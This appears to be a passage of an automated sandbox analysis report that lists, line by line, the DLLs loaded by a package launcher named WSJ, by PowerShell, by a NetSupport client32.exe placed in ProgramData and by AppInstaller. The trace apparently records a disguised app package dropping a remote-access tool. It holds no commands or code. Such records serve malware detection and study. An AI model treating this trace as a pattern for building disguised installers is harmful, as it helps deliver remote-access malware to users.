Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: daxexec.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: fltlib.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: container.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: capauthz.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: windows.staterepositorycore.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: capauthz.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositorycore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: capauthz.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositorycore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: daxexec.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fltlib.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: container.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: capauthz.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositorycore.dll	Jump to behavior
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: pcicl32.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: shfolder.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: pcichek.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: pcicapi.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: mpr.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: version.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: winmm.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: wsock32.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: netapi32.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: wininet.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: msvcr100.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: msvcr100.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: netutils.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: samcli.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: dbghelp.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: wtsapi32.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: dbgcore.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: nsmtrace.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: nslsp.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: devobj.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: msasn1.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: pcihooks.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: wbemcomn.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: textshaping.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: winsta.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: amsi.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: userenv.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: profapi.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: riched32.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: riched20.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: usp10.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: msls31.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: wldp.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: pciinv.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: iertutil.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: firewallapi.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: dnsapi.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: iphlpapi.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: fwbase.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: winhttp.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: mswsock.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: winnsi.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: urlmon.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: srvcli.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: profext.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: ntmarta.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: rasadhlp.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: dhcpcsvc6.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: dhcpcsvc.dll
Source: C:\ProgramData\netsupport\client\client32.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: msvcp140.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: concrt140.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: vcruntime140_1.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: vcruntime140_1.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: vcruntime140_1.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.ui.xaml.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: coremessaging.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: bcp47langs.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: iertutil.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dcomp.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: wintypes.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.storage.applicationdata.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: twinapi.appcore.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: wldp.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: propsys.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: rometadata.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.staterepositorycore.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.ui.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windowmanagementapi.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: textinputframework.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: inputhost.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: coreuicomponents.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: coreuicomponents.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: ntmarta.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: uxtheme.dll
